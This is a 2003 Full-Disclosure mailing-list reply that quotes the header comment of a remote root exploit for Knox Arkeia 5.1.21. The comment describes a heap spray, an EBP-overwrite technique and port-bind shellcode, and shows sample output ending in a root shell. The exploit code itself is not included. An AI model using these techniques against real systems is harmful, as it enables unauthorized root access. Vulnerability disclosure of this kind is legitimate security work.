[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Knox Arkeia 5.1.21 local/remote root exploit
- To: "A. C." <bugtraq_vuln@xxxxxxxxx>
- Subject: Re: [Full-Disclosure] Knox Arkeia 5.1.21 local/remote root exploit
- From: David Hane <dlhane@xxxxxxxxxxxxx>
- Date: Fri, 19 Sep 2003 14:29:16 -0700
Have you tested this on other versions?
DH
On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
>
>
>
> /*
> * Knox Arkiea arkiead local/remote root exploit.
> *
> * Portbind 5074 shellcode
> *
> * Tested on Redhat 8.0, Redhat 7.2, but all versions
> are presumed vulnerable.
> *
> * NULLs out least significant byte of EBP to pull EIP
> out of overflow buffer.
> * A previous request forces a large allocation of
> NOP's + shellcode in heap
> * memory. Find additional targets by searching the
> heap for NOP's after a
> * crash. safeaddr must point to any area of memory
> that is read/writable
> * and won't mess with program/shellcode flow.
> *
> * ./ark_sink host targetnum
> * [user@host dir]$ ./ark_sink 192.168.1.2 1
> * [*] Connected to 192.168.1.2:617
> * [*] Connected to 192.168.1.2:617
> * [*] Sending nops+shellcode
> * [*] Done, sleeping
> * [*] Sending overflow
> * [*] Done
> * [*] Sleeping and connecting remote shell
> * [*] Connected to 192.168.1.2:5074
> * [*] Success, enjoy
> * id
> * uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> *
> *
> */
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html